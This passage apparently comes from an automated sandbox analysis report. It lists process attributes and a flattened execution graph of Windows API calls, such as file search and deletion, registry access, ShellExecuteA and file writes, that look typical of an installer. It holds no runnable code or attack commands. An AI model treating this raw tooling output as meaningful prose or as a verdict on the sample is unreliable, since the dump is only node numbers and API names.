                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:false

                                                                                                                                                                Reset < >

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:17.1%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                  Signature Coverage:21.8%
                                                                                                                                                                  Total number of Nodes:1278
                                                                                                                                                                  Total number of Limit Nodes:23
                                                                                                                                                                  execution_graph 2738 403540 2739 403558 2738->2739 2740 40354a CloseHandle 2738->2740 2745 403585 2739->2745 2740->2739 2746 403593 2745->2746 2747 40355d 2746->2747 2748 403598 FreeLibrary GlobalFree 2746->2748 2749 4054ec 2747->2749 2748->2747 2748->2748 2791 40579b 2749->2791 2752 405520 2755 405655 2752->2755 2805 405bc7 lstrcpynA 2752->2805 2753 405509 DeleteFileA 2754 403569 2753->2754 2755->2754 2810 405ec2 FindFirstFileA 2755->2810 2757 40554a 2758 40555b 2757->2758 2759 40554e lstrcatA 2757->2759 2819 405701 lstrlenA 2758->2819 2761 405561 2759->2761 2764 40556f lstrcatA 2761->2764 2765 40557a lstrlenA FindFirstFileA 2761->2765 2764->2765 2765->2755 2786 40559e 2765->2786 2771 405695 2771->2754 2776 40569b 2771->2776 2772 4056ac 2773 404eb3 25 API calls 2772->2773 2773->2754 2774 405634 FindNextFileA 2777 40564c FindClose 2774->2777 2774->2786 2778 404eb3 25 API calls 2776->2778 2777->2755 2780 4056a3 2778->2780 2779 4055fb 2781 40587f 2 API calls 2779->2781 2782 405915 40 API calls 2780->2782 2784 405601 DeleteFileA 2781->2784 2783 4056aa 2782->2783 2783->2754 2790 40560c 2784->2790 2785 4054ec 61 API calls 2785->2786 2786->2774 2786->2779 2786->2785 2806 4056e5 2786->2806 2823 405bc7 lstrcpynA 2786->2823 2787 404eb3 25 API calls 2787->2774 2790->2774 2790->2787 2824 404eb3 2790->2824 2835 405915 2790->2835 2861 405bc7 lstrcpynA 2791->2861 2793 4057ac 2862 40574e CharNextA CharNextA 2793->2862 2796 405500 2796->2752 2796->2753 2798 4057ed lstrlenA 2799 4057f8 2798->2799 2803 4057c2 2798->2803 2801 4056ba 3 API calls 2799->2801 2800 405ec2 2 API calls 2800->2803 2802 4057fd GetFileAttributesA 2801->2802 2802->2796 2803->2796 2803->2798 2803->2800 2804 405701 2 API calls 2803->2804 2804->2798 2805->2757 2807 4056eb 2806->2807 2808 4056fe 2807->2808 2809 4056f1 CharNextA 2807->2809 2808->2786 2809->2807 2811 405ed8 FindClose 2810->2811 2812 40567a 2810->2812 2811->2812 2812->2754 2813 4056ba lstrlenA CharPrevA 2812->2813 2814 4056d4 lstrcatA 2813->2814 2815 405684 2813->2815 2814->2815 2816 40587f GetFileAttributesA 2815->2816 2817 40568a RemoveDirectoryA 2816->2817 2818 40588e SetFileAttributesA 2816->2818 2817->2771 2817->2772 2818->2817 2820 40570e 2819->2820 2821 405713 CharPrevA 2820->2821 2822 40571f 2820->2822 2821->2820 2821->2822 2822->2761 2823->2786 2825 404ece 2824->2825 2833 404f71 2824->2833 2826 404eeb lstrlenA 2825->2826 2877 405be9 2825->2877 2828 404f14 2826->2828 2829 404ef9 lstrlenA 2826->2829 2831 404f27 2828->2831 2832 404f1a SetWindowTextA 2828->2832 2830 404f0b lstrcatA 2829->2830 2829->2833 2830->2828 2831->2833 2834 404f2d SendMessageA SendMessageA SendMessageA 2831->2834 2832->2831 2833->2790 2834->2833 2904 405f57 GetModuleHandleA 2835->2904 2838 40597d GetShortPathNameA 2840 405992 2838->2840 2841 405a72 2838->2841 2840->2841 2843 40599a wsprintfA 2840->2843 2841->2790 2842 405961 CloseHandle GetShortPathNameA 2842->2841 2844 405975 2842->2844 2845 405be9 18 API calls 2843->2845 2844->2838 2844->2841 2846 4059c2 2845->2846 2911 40589e GetFileAttributesA CreateFileA 2846->2911 2848 4059cf 2848->2841 2849 4059de GetFileSize GlobalAlloc 2848->2849 2850 405a6b CloseHandle 2849->2850 2851 4059fc ReadFile 2849->2851 2850->2841 2851->2850 2852 405a10 2851->2852 2852->2850 2912 405813 lstrlenA 2852->2912 2855 405a25 2917 405bc7 lstrcpynA 2855->2917 2856 405a7f 2857 405813 4 API calls 2856->2857 2859 405a33 2857->2859 2860 405a46 SetFilePointer WriteFile GlobalFree 2859->2860 2860->2850 2861->2793 2863 405774 2862->2863 2864 405768 2862->2864 2866 4056e5 CharNextA 2863->2866 2867 405791 2863->2867 2864->2863 2865 40576f CharNextA 2864->2865 2865->2867 2866->2863 2867->2796 2868 405e29 2867->2868 2875 405e35 2868->2875 2869 405e9d 2870 405ea1 CharPrevA 2869->2870 2872 405ebc 2869->2872 2870->2869 2871 405e92 CharNextA 2871->2869 2871->2875 2872->2803 2873 4056e5 CharNextA 2873->2875 2874 405e80 CharNextA 2874->2875 2875->2869 2875->2871 2875->2873 2875->2874 2876 405e8d CharNextA 2875->2876 2876->2871 2882 405bf6 2877->2882 2878 405e10 2879 405e25 2878->2879 2903 405bc7 lstrcpynA 2878->2903 2879->2826 2881 405c8e GetVersion 2887 405c9b 2881->2887 2882->2878 2882->2881 2883 405de7 lstrlenA 2882->2883 2884 405be9 10 API calls 2882->2884 2891 405e29 5 API calls 2882->2891 2901 405b25 wsprintfA 2882->2901 2902 405bc7 lstrcpynA 2882->2902 2883->2882 2884->2883 2887->2882 2889 405d06 GetSystemDirectoryA 2887->2889 2890 405d19 GetWindowsDirectoryA 2887->2890 2892 405be9 10 API calls 2887->2892 2893 405d90 lstrcatA 2887->2893 2894 405d4d SHGetSpecialFolderLocation 2887->2894 2896 405aae RegOpenKeyExA 2887->2896 2889->2887 2890->2887 2891->2882 2892->2887 2893->2882 2894->2887 2895 405d65 SHGetPathFromIDListA CoTaskMemFree 2894->2895 2895->2887 2897 405ae1 RegQueryValueExA 2896->2897 2898 405b1f 2896->2898 2899 405b02 RegCloseKey 2897->2899 2898->2887 2899->2898 2901->2882 2902->2882 2903->2879 2905 405f73 2904->2905 2906 405f7d GetProcAddress 2904->2906 2918 405ee9 GetSystemDirectoryA 2905->2918 2908 405920 2906->2908 2908->2838 2908->2841 2910 40589e GetFileAttributesA CreateFileA 2908->2910 2909 405f79 2909->2906 2909->2908 2910->2842 2911->2848 2913 405849 lstrlenA 2912->2913 2914 405827 lstrcmpiA 2913->2914 2916 405853 2913->2916 2915 405840 CharNextA 2914->2915 2914->2916 2915->2913 2916->2855 2916->2856 2917->2859 2919 405f0b wsprintfA LoadLibraryExA 2918->2919 2919->2909 3402 4042c1 3403 4042ed 3402->3403 3404 4042fe 3402->3404 3463 40546c GetDlgItemTextA 3403->3463 3406 40430a GetDlgItem 3404->3406 3412 404369 3404->3412 3409 40431e 3406->3409 3407 40444d 3411 4045f7 3407->3411 3465 40546c GetDlgItemTextA 3407->3465 3408 4042f8 3410 405e29 5 API calls 3408->3410 3414 404332 SetWindowTextA 3409->3414 3415 40574e 4 API calls 3409->3415 3410->3404 3419 403eea 8 API calls 3411->3419 3412->3407 3412->3411 3416 405be9 18 API calls 3412->3416 3418 403e83 19 API calls 3414->3418 3420 404328 3415->3420 3421 4043dd SHBrowseForFolderA 3416->3421 3417 40447d 3422 40579b 18 API calls 3417->3422 3423 40434e 3418->3423 3424 40460b 3419->3424 3420->3414 3428 4056ba 3 API calls 3420->3428 3421->3407 3425 4043f5 CoTaskMemFree 3421->3425 3426 404483 3422->3426 3427 403e83 19 API calls 3423->3427 3429 4056ba 3 API calls 3425->3429 3466 405bc7 lstrcpynA 3426->3466 3430 40435c 3427->3430 3428->3414 3431 404402 3429->3431 3464 403eb8 SendMessageA 3430->3464 3434 404439 SetDlgItemTextA 3431->3434 3439 405be9 18 API calls 3431->3439 3434->3407 3435 404362 3437 405f57 5 API calls 3435->3437 3436 40449a 3438 405f57 5 API calls 3436->3438 3437->3412 3445 4044a1 3438->3445 3440 404421 lstrcmpiA 3439->3440 3440->3434 3443 404432 lstrcatA 3440->3443 3441 4044dd 3467 405bc7 lstrcpynA 3441->3467 3443->3434 3444 4044e4 3446 40574e 4 API calls 3444->3446 3445->3441 3449 405701 2 API calls 3445->3449 3451 404535 3445->3451 3447 4044ea GetDiskFreeSpaceA 3446->3447 3450 40450e MulDiv 3447->3450 3447->3451 3449->3445 3450->3451 3452 4045a6 3451->3452 3468 40473d 3451->3468 3453 4045c9 3452->3453 3455 40140b 2 API calls 3452->3455 3479 403ea5 EnableWindow 3453->3479 3455->3453 3458 4045a8 SetDlgItemTextA 3458->3452 3459 404598 3471 404678 3459->3471 3460 4045e5 3460->3411 3480 404256 3460->3480 3463->3408 3464->3435 3465->3417 3466->3436 3467->3444 3469 404678 21 API calls 3468->3469 3470 404593 3469->3470 3470->3458 3470->3459 3472 40468e 3471->3472 3473 405be9 18 API calls 3472->3473 3474 4046f2 3473->3474 3475 405be9 18 API calls 3474->3475 3476 4046fd 3475->3476 3477 405be9 18 API calls 3476->3477 3478 404713 lstrlenA wsprintfA SetDlgItemTextA 3477->3478 3478->3452 3479->3460 3481 404264 3480->3481 3482 404269 SendMessageA 3480->3482 3481->3482 3482->3411 3483 401cc2 3487 402a0c 3483->3487 3485 401cd2 SetWindowLongA 3486 4028be 3485->3486 3488 405be9 18 API calls 3487->3488 3489 402a20 3488->3489 3489->3485 3490 401a43 3491 402a0c 18 API calls 3490->3491 3492 401a49 3491->3492 3493 402a0c 18 API calls 3492->3493 3494 4019f3 3493->3494 3495 402648 3496 40264b 3495->3496 3500 402663 3495->3500 3497 402658 FindNextFileA 3496->3497 3498 4026a2 3497->3498 3497->3500 3501 405bc7 lstrcpynA 3498->3501 3501->3500 3505 401bca 3506 402a0c 18 API calls 3505->3506 3507 401bd1 3506->3507 3508 402a0c 18 API calls 3507->3508 3509 401bdb 3508->3509 3510 401beb 3509->3510 3511 402a29 18 API calls 3509->3511 3512 402a29 18 API calls 3510->3512 3516 401bfb 3510->3516 3511->3510 3512->3516 3513 401c06 3517 402a0c 18 API calls 3513->3517 3514 401c4a 3515 402a29 18 API calls 3514->3515 3518 401c4f 3515->3518 3516->3513 3516->3514 3519 401c0b 3517->3519 3521 402a29 18 API calls 3518->3521 3520 402a0c 18 API calls 3519->3520 3522 401c14 3520->3522 3523 401c58 FindWindowExA 3521->3523 3524 401c3a SendMessageA 3522->3524 3525 401c1c SendMessageTimeoutA 3522->3525 3526 401c76 3523->3526 3524->3526 3525->3526 3527 403fcb 3528 403fe1 3527->3528 3529 4040ee 3527->3529 3531 403e83 19 API calls 3528->3531 3530 40415d 3529->3530 3534 404231 3529->3534 3539 404132 GetDlgItem SendMessageA 3529->3539 3532 404167 GetDlgItem 3530->3532 3530->3534 3533 404037 3531->3533 3535 40417d 3532->3535 3536 4041ef 3532->3536 3537 403e83 19 API calls 3533->3537 3538 403eea 8 API calls 3534->3538 3535->3536 3543 4041a3 6 API calls 3535->3543 3536->3534 3544 404201 3536->3544 3541 404044 CheckDlgButton 3537->3541 3542 40422c 3538->3542 3558 403ea5 EnableWindow 3539->3558 3556 403ea5 EnableWindow 3541->3556 3543->3536 3547 404207 SendMessageA 3544->3547 3548 404218 3544->3548 3545 404158 3549 404256 SendMessageA 3545->3549 3547->3548 3548->3542 3551 40421e SendMessageA 3548->3551 3549->3530 3550 404062 GetDlgItem 3557 403eb8 SendMessageA 3550->3557 3551->3542 3553 404078 SendMessageA 3554 404096 GetSysColor 3553->3554 3555 40409f SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3553->3555 3554->3555 3555->3542 3556->3550 3557->3553 3558->3545 3559 4024cf 3560 402a29 18 API calls 3559->3560 3561 4024d6 3560->3561 3564 40589e GetFileAttributesA CreateFileA 3561->3564 3563 4024e2 3564->3563 3027 401751 3065 402a29 3027->3065 3029 401758 3030 401776 3029->3030 3031 40177e 3029->3031 3093 405bc7 lstrcpynA 3030->3093 3094 405bc7 lstrcpynA 3031->3094 3034 40177c 3037 405e29 5 API calls 3034->3037 3035 401789 3036 4056ba 3 API calls 3035->3036 3038 40178f lstrcatA 3036->3038 3051 40179b 3037->3051 3038->3034 3039 405ec2 2 API calls 3039->3051 3040 40587f 2 API calls 3040->3051 3042 4017b2 CompareFileTime 3042->3051 3043 401876 3044 404eb3 25 API calls 3043->3044 3046 401880 3044->3046 3045 405bc7 lstrcpynA 3045->3051 3072 402e8e 3046->3072 3047 404eb3 25 API calls 3049 401862 3047->3049 3051->3039 3051->3040 3051->3042 3051->3043 3051->3045 3053 405be9 18 API calls 3051->3053 3064 40184d 3051->3064 3071 40589e GetFileAttributesA CreateFileA 3051->3071 3095 405488 3051->3095 3052 4018a7 SetFileTime 3054 4018b9 FindCloseChangeNotification 3052->3054 3053->3051 3054->3049 3055 4018ca 3054->3055 3056 4018e2 3055->3056 3057 4018cf 3055->3057 3059 405be9 18 API calls 3056->3059 3058 405be9 18 API calls 3057->3058 3062 4018d7 lstrcatA 3058->3062 3060 4018ea 3059->3060 3063 405488 MessageBoxIndirectA 3060->3063 3062->3060 3063->3049 3064->3047 3064->3049 3066 402a35 3065->3066 3067 405be9 18 API calls 3066->3067 3068 402a56 3067->3068 3069 402a62 3068->3069 3070 405e29 5 API calls 3068->3070 3069->3029 3070->3069 3071->3051 3074 402ea4 3072->3074 3073 402ed2 3099 4030b0 ReadFile 3073->3099 3074->3073 3101 4030e2 SetFilePointer 3074->3101 3078 403044 3081 403048 3078->3081 3082 403060 3078->3082 3079 402eef GetTickCount 3080 401893 3079->3080 3089 402f3e 3079->3089 3080->3052 3080->3054 3083 4030b0 ReadFile 3081->3083 3082->3080 3085 4030b0 ReadFile 3082->3085 3086 40307b WriteFile 3082->3086 3083->3080 3084 4030b0 ReadFile 3084->3089 3085->3082 3086->3080 3087 403090 3086->3087 3087->3080 3087->3082 3088 402f94 GetTickCount 3088->3089 3089->3080 3089->3084 3089->3088 3090 402fb9 MulDiv wsprintfA 3089->3090 3091 402ff7 WriteFile 3089->3091 3092 404eb3 25 API calls 3090->3092 3091->3080 3091->3089 3092->3089 3093->3034 3094->3035 3098 40549d 3095->3098 3096 4054e9 3096->3051 3097 4054b1 MessageBoxIndirectA 3097->3096 3098->3096 3098->3097 3100 402edd 3099->3100 3100->3078 3100->3079 3100->3080 3101->3073 3565 401651 3566 402a29 18 API calls 3565->3566 3567 401657 3566->3567 3568 405ec2 2 API calls 3567->3568 3569 40165d 3568->3569 3570 401951 3571 402a0c 18 API calls 3570->3571 3572 401958 3571->3572 3573 402a0c 18 API calls 3572->3573 3574 401962 3573->3574 3575 402a29 18 API calls 3574->3575 3576 40196b 3575->3576 3577 40197e lstrlenA 3576->3577 3579 4019b9 3576->3579 3578 401988 3577->3578 3578->3579 3583 405bc7 lstrcpynA 3578->3583 3581 4019a2 3581->3579 3582 4019af lstrlenA 3581->3582 3582->3579 3583->3581 3584 4019d2 3585 402a29 18 API calls 3584->3585 3586 4019d9 3585->3586 3587 402a29 18 API calls 3586->3587 3588 4019e2 3587->3588 3589 4019e9 lstrcmpiA 3588->3589 3590 4019fb lstrcmpA 3588->3590 3591 4019ef 3589->3591 3590->3591 3592 402053 3593 402a29 18 API calls 3592->3593 3594 40205a 3593->3594 3595 402a29 18 API calls 3594->3595 3596 402064 3595->3596 3597 402a29 18 API calls 3596->3597 3598 40206d 3597->3598 3599 402a29 18 API calls 3598->3599 3600 402077 3599->3600 3601 402a29 18 API calls 3600->3601 3603 402081 3601->3603 3602 402095 CoCreateInstance 3607 4020b4 3602->3607 3609 40216a 3602->3609 3603->3602 3604 402a29 18 API calls 3603->3604 3604->3602 3605 401423 25 API calls 3606 40219c 3605->3606 3608 402149 MultiByteToWideChar 3607->3608 3607->3609 3608->3609 3609->3605 3609->3606 3610 402256 3611 402264 3610->3611 3612 40225e 3610->3612 3614 402274 3611->3614 3615 402a29 18 API calls 3611->3615 3613 402a29 18 API calls 3612->3613 3613->3611 3616 402282 3614->3616 3618 402a29 18 API calls 3614->3618 3615->3614 3617 402a29 18 API calls 3616->3617 3619 40228b WritePrivateProfileStringA 3617->3619 3618->3616 3620 4014d6 3621 402a0c 18 API calls 3620->3621 3622 4014dc Sleep 3621->3622 3624 4028be 3622->3624 3625 4035d8 3626 4035e3 3625->3626 3627 4035e7 3626->3627 3628 4035ea GlobalAlloc 3626->3628 3628->3627 3629 40245a 3639 402b33 3629->3639 3631 402464 3632 402a0c 18 API calls 3631->3632 3633 40246d 3632->3633 3634 402490 RegEnumValueA 3633->3634 3635 402484 RegEnumKeyA 3633->3635 3636 40268f 3633->3636 3634->3636 3637 4024a9 RegCloseKey 3634->3637 3635->3637 3637->3636 3640 402a29 18 API calls 3639->3640 3641 402b4c 3640->3641 3642 402b5a RegOpenKeyExA 3641->3642 3642->3631 3643 4022da 3644 40230a 3643->3644 3645 4022df 3643->3645 3646 402a29 18 API calls 3644->3646 3647 402b33 19 API calls 3645->3647 3648 402311 3646->3648 3649 4022e6 3647->3649 3654 402a69 RegOpenKeyExA 3648->3654 3650 402a29 18 API calls 3649->3650 3653 402327 3649->3653 3652 4022f7 RegDeleteValueA RegCloseKey 3650->3652 3652->3653 3661 402a94 3654->3661 3663 402ae0 3654->3663 3655 402aba RegEnumKeyA 3656 402acc RegCloseKey 3655->3656 3655->3661 3658 405f57 5 API calls 3656->3658 3657 402af1 RegCloseKey 3657->3663 3660 402adc 3658->3660 3659 402a69 5 API calls 3659->3661 3662 402b0c RegDeleteKeyA 3660->3662 3660->3663 3661->3655 3661->3656 3661->3657 3661->3659 3662->3663 3663->3653 3664 40155b 3665 402866 3664->3665 3668 405b25 wsprintfA 3665->3668 3667 40286b 3668->3667 3669 401cde GetDlgItem GetClientRect 3670 402a29 18 API calls 3669->3670 3671 401d0e LoadImageA SendMessageA 3670->3671 3672 401d2c DeleteObject 3671->3672 3673 4028be 3671->3673 3672->3673 3674 401dde 3675 402a29 18 API calls 3674->3675 3676 401de4 3675->3676 3677 402a29 18 API calls 3676->3677 3678 401ded 3677->3678 3679 402a29 18 API calls 3678->3679 3680 401df6 3679->3680 3681 402a29 18 API calls 3680->3681 3682 401dff 3681->3682 3683 401423 25 API calls 3682->3683 3684 401e06 ShellExecuteA 3683->3684 3685 401e33 3684->3685 3686 401662 3687 402a29 18 API calls 3686->3687 3688 401669 3687->3688 3689 402a29 18 API calls 3688->3689 3690 401672 3689->3690 3691 402a29 18 API calls 3690->3691 3692 40167b MoveFileA 3691->3692 3693 40168e 3692->3693 3699 401687 3692->3699 3695 405ec2 2 API calls 3693->3695 3697 40219c 3693->3697 3694 401423 25 API calls 3694->3697 3696 40169d 3695->3696 3696->3697 3698 405915 40 API calls 3696->3698 3698->3699 3699->3694 3700 401ee2 3701 402a29 18 API calls 3700->3701 3702 401ee9 3701->3702 3703 405f57 5 API calls 3702->3703 3704 401ef8 3703->3704 3705 401f10 GlobalAlloc 3704->3705 3706 401f78 3704->3706 3705->3706 3707 401f24 3705->3707 3708 405f57 5 API calls 3707->3708 3709 401f2b 3708->3709 3710 405f57 5 API calls 3709->3710 3711 401f35 3710->3711 3711->3706 3715 405b25 wsprintfA 3711->3715 3713 401f6c 3716 405b25 wsprintfA 3713->3716 3715->3713 3716->3706 3717 4023e2 3718 402b33 19 API calls 3717->3718 3719 4023ec 3718->3719 3720 402a29 18 API calls 3719->3720 3721 4023f5 3720->3721 3722 4023ff RegQueryValueExA 3721->3722 3725 40268f 3721->3725 3723 402425 RegCloseKey 3722->3723 3724 40241f 3722->3724 3723->3725 3724->3723 3728 405b25 wsprintfA 3724->3728 3728->3723 3729 401567 3730 401577 ShowWindow 3729->3730 3731 40157e 3729->3731 3730->3731 3732 40158c ShowWindow 3731->3732 3733 4028be 3731->3733 3732->3733 3734 402b6e 3735 402b96 3734->3735 3736 402b7d SetTimer 3734->3736 3737 402beb 3735->3737 3738 402bb0 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3735->3738 3736->3735 3738->3737 3739 4014f0 SetForegroundWindow 3740 4028be 3739->3740 3741 402671 3742 402a29 18 API calls 3741->3742 3743 402678 FindFirstFileA 3742->3743 3744 40269b 3743->3744 3748 40268b 3743->3748 3745 4026a2 3744->3745 3749 405b25 wsprintfA 3744->3749 3750 405bc7 lstrcpynA 3745->3750 3749->3745 3750->3748 3751 404ff1 3752 405012 GetDlgItem GetDlgItem GetDlgItem 3751->3752 3753 40519d 3751->3753 3797 403eb8 SendMessageA 3752->3797 3755 4051a6 GetDlgItem CreateThread CloseHandle 3753->3755 3756 4051ce 3753->3756 3755->3756 3758 4051f9 3756->3758 3759 4051e5 ShowWindow ShowWindow 3756->3759 3760 40521b 3756->3760 3757 405083 3765 40508a GetClientRect GetSystemMetrics SendMessageA SendMessageA 3757->3765 3761 405257 3758->3761 3762 405230 ShowWindow 3758->3762 3763 40520a 3758->3763 3799 403eb8 SendMessageA 3759->3799 3764 403eea 8 API calls 3760->3764 3761->3760 3772 405262 SendMessageA 3761->3772 3768 405250 3762->3768 3769 405242 3762->3769 3767 403e5c SendMessageA 3763->3767 3778 405229 3764->3778 3770 4050f9 3765->3770 3771 4050dd SendMessageA SendMessageA 3765->3771 3767->3760 3774 403e5c SendMessageA 3768->3774 3773 404eb3 25 API calls 3769->3773 3775 40510c 3770->3775 3776 4050fe SendMessageA 3770->3776 3771->3770 3777 40527b CreatePopupMenu 3772->3777 3772->3778 3773->3768 3774->3761 3780 403e83 19 API calls 3775->3780 3776->3775 3779 405be9 18 API calls 3777->3779 3782 40528b AppendMenuA 3779->3782 3781 40511c 3780->3781 3785 405125 ShowWindow 3781->3785 3786 405159 GetDlgItem SendMessageA 3781->3786 3783 4052b1 3782->3783 3784 40529e GetWindowRect 3782->3784 3787 4052ba TrackPopupMenu 3783->3787 3784->3787 3788 405148 3785->3788 3789 40513b ShowWindow 3785->3789 3786->3778 3790 405180 SendMessageA SendMessageA 3786->3790 3787->3778 3791 4052d8 3787->3791 3798 403eb8 SendMessageA 3788->3798 3789->3788 3790->3778 3792 4052f4 SendMessageA 3791->3792 3792->3792 3794 405311 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3792->3794 3795 405333 SendMessageA 3794->3795 3795->3795 3796 405354 GlobalUnlock SetClipboardData CloseClipboard 3795->3796 3796->3778 3797->3757 3798->3786 3799->3758 3800 4024f1 3801 4024f6 3800->3801 3802 402507 3800->3802 3803 402a0c 18 API calls 3801->3803 3804 402a29 18 API calls 3802->3804 3806 4024fd 3803->3806 3805 40250e lstrlenA 3804->3805 3805->3806 3807 40252d WriteFile 3806->3807 3808 40268f 3806->3808 3807->3808 3814 4018f5 3815 40192c 3814->3815 3816 402a29 18 API calls 3815->3816 3817 401931 3816->3817 3818 4054ec 70 API calls 3817->3818 3819 40193a 3818->3819 3820 4018f8 3821 402a29 18 API calls 3820->3821 3822 4018ff 3821->3822 3823 405488 MessageBoxIndirectA 3822->3823 3824 401908 3823->3824 3825 40427a 3826 4042b0 3825->3826 3827 40428a 3825->3827 3829 403eea 8 API calls 3826->3829 3828 403e83 19 API calls 3827->3828 3830 404297 SetDlgItemTextA 3828->3830 3831 4042bc 3829->3831 3830->3826 3832 4014fe 3833 401506 3832->3833 3835 401519 3832->3835 3834 402a0c 18 API calls 3833->3834 3834->3835 3836 4025ff 3837 402606 3836->3837 3838 40286b 3836->3838 3839 402a0c 18 API calls 3837->3839 3840 402611 3839->3840 3841 402618 SetFilePointer 3840->3841 3841->3838 3842 402628 3841->3842 3844 405b25 wsprintfA 3842->3844 3844->3838 3845 401000 3846 401037 BeginPaint GetClientRect 3845->3846 3847 40100c DefWindowProcA 3845->3847 3848 4010f3 3846->3848 3850 401179 3847->3850 3851 401073 CreateBrushIndirect FillRect DeleteObject 3848->3851 3852 4010fc 3848->3852 3851->3848 3853 401102 CreateFontIndirectA 3852->3853 3854 401167 EndPaint 3852->3854 3853->3854 3855 401112 6 API calls 3853->3855 3854->3850 3855->3854 3856 404802 GetDlgItem GetDlgItem 3857 404856 7 API calls 3856->3857 3863 404a73 3856->3863 3858 4048fc DeleteObject 3857->3858 3859 4048ef SendMessageA 3857->3859 3860 404907 3858->3860 3859->3858 3861 40493e 3860->3861 3862 405be9 18 API calls 3860->3862 3864 403e83 19 API calls 3861->3864 3866 404920 SendMessageA SendMessageA 3862->3866 3869 404b5d 3863->3869 3889 404ae7 3863->3889 3909 404782 SendMessageA 3863->3909 3868 404952 3864->3868 3865 404c0c 3867 404c15 SendMessageA 3865->3867 3872 404c21 3865->3872 3866->3860 3867->3872 3874 403e83 19 API calls 3868->3874 3869->3865 3875 404bb6 SendMessageA 3869->3875 3899 404a66 3869->3899 3870 403eea 8 API calls 3876 404dfc 3870->3876 3871 404b4f SendMessageA 3871->3869 3877 404c33 ImageList_Destroy 3872->3877 3878 404c3a 3872->3878 3884 404c4a 3872->3884 3890 404960 3874->3890 3880 404bcb SendMessageA 3875->3880 3875->3899 3877->3878 3882 404c43 GlobalFree 3878->3882 3878->3884 3879 404db0 3885 404dc2 ShowWindow GetDlgItem ShowWindow 3879->3885 3879->3899 3881 404bde 3880->3881 3893 404bef SendMessageA 3881->3893 3882->3884 3883 404a34 GetWindowLongA SetWindowLongA 3886 404a4d 3883->3886 3884->3879 3892 40140b 2 API calls 3884->3892 3903 404c7c 3884->3903 3885->3899 3887 404a53 ShowWindow 3886->3887 3888 404a6b 3886->3888 3907 403eb8 SendMessageA 3887->3907 3908 403eb8 SendMessageA 3888->3908 3889->3869 3889->3871 3890->3883 3891 4049af SendMessageA 3890->3891 3894 404a2e 3890->3894 3897 4049eb SendMessageA 3890->3897 3898 4049fc SendMessageA 3890->3898 3891->3890 3892->3903 3893->3865 3894->3883 3894->3886 3897->3890 3898->3890 3899->3870 3900 404d86 InvalidateRect 3900->3879 3901 404d9c 3900->3901 3904 40473d 21 API calls 3901->3904 3902 404caa SendMessageA 3906 404cc0 3902->3906 3903->3902 3903->3906 3904->3879 3905 404d34 SendMessageA SendMessageA 3905->3906 3906->3900 3906->3905 3907->3899 3908->3863 3910 4047e1 SendMessageA 3909->3910 3911 4047a5 GetMessagePos ScreenToClient SendMessageA 3909->3911 3912 4047d9 3910->3912 3911->3912 3913 4047de 3911->3913 3912->3889 3913->3910 3914 401b02 3915 402a29 18 API calls 3914->3915 3916 401b09 3915->3916 3917 402a0c 18 API calls 3916->3917 3918 401b12 wsprintfA 3917->3918 3919 4028be 3918->3919 3920 404e03 3921 404e11 3920->3921 3922 404e28 3920->3922 3924 404e91 3921->3924 3925 404e17 3921->3925 3923 404e36 IsWindowVisible 3922->3923 3931 404e4d 3922->3931 3923->3924 3926 404e43 3923->3926 3927 404e97 CallWindowProcA 3924->3927 3928 403ecf SendMessageA 3925->3928 3929 404782 5 API calls 3926->3929 3930 404e21 3927->3930 3928->3930 3929->3931 3931->3927 3939 405bc7 lstrcpynA 3931->3939 3933 404e7c 3940 405b25 wsprintfA 3933->3940 3935 404e83 3936 40140b 2 API calls 3935->3936 3937 404e8a 3936->3937 3941 405bc7 lstrcpynA 3937->3941 3939->3933 3940->3935 3941->3924 3942 401a03 3943 402a29 18 API calls 3942->3943 3944 401a0c ExpandEnvironmentStringsA 3943->3944 3945 401a20 3944->3945 3946 401a33 3944->3946 3945->3946 3947 401a25 lstrcmpA 3945->3947 3947->3946 3948 401f84 3949 401f96 3948->3949 3950 402045 3948->3950 3951 402a29 18 API calls 3949->3951 3952 401423 25 API calls 3950->3952 3953 401f9d 3951->3953 3958 40219c 3952->3958 3954 402a29 18 API calls 3953->3954 3955 401fa6 3954->3955 3956 401fbb LoadLibraryExA 3955->3956 3957 401fae GetModuleHandleA 3955->3957 3956->3950 3959 401fcb GetProcAddress 3956->3959 3957->3956 3957->3959 3960 402018 3959->3960 3961 401fdb 3959->3961 3962 404eb3 25 API calls 3960->3962 3963 401423 25 API calls 3961->3963 3964 401feb 3961->3964 3962->3964 3963->3964 3964->3958 3965 402039 FreeLibrary 3964->3965 3965->3958 3966 401c8a 3967 402a0c 18 API calls 3966->3967 3968 401c90 IsWindow 3967->3968 3969 4019f3 3968->3969 3970 401490 3971 404eb3 25 API calls 3970->3971 3972 401497 3971->3972 3973 404612 3974 404622 3973->3974 3975 40463e 3973->3975 3984 40546c GetDlgItemTextA 3974->3984 3977 404671 3975->3977 3978 404644 SHGetPathFromIDListA 3975->3978 3979 40465b SendMessageA 3978->3979 3980 404654 3978->3980 3979->3977 3982 40140b 2 API calls 3980->3982 3981 40462f SendMessageA 3981->3975 3982->3979 3984->3981 3985 401595 3986 402a29 18 API calls 3985->3986 3987 40159c SetFileAttributesA 3986->3987 3988 4015ae 3987->3988 3989 401717 3990 402a29 18 API calls 3989->3990 3991 40171e SearchPathA 3990->3991 3992 401739 3991->3992 3993 403f97 lstrcpynA lstrlenA 3994 402899 SendMessageA 3995 4028b3 InvalidateRect 3994->3995 3996 4028be 3994->3996 3995->3996 3997 40229a 3998 402a29 18 API calls 3997->3998 3999 4022a8 3998->3999 4000 402a29 18 API calls 3999->4000 4001 4022b1 4000->4001 4002 402a29 18 API calls 4001->4002 4003 4022bb GetPrivateProfileStringA 4002->4003 4004 40149d 4005 402241 4004->4005 4006 4014ab PostQuitMessage 4004->4006 4006->4005 4007 401b23 4008 401b30 4007->4008 4009 401b74 4007->4009 4012 40222e 4008->4012 4015 401b47 4008->4015 4010 401b78 4009->4010 4011 401b9d GlobalAlloc 4009->4011 4022 401bb8 4010->4022 4028 405bc7 lstrcpynA 4010->4028 4013 405be9 18 API calls 4011->4013 4014 405be9 18 API calls 4012->4014 4013->4022 4017 40223b 4014->4017 4026 405bc7 lstrcpynA 4015->4026 4020 405488 MessageBoxIndirectA 4017->4020 4019 401b8a GlobalFree 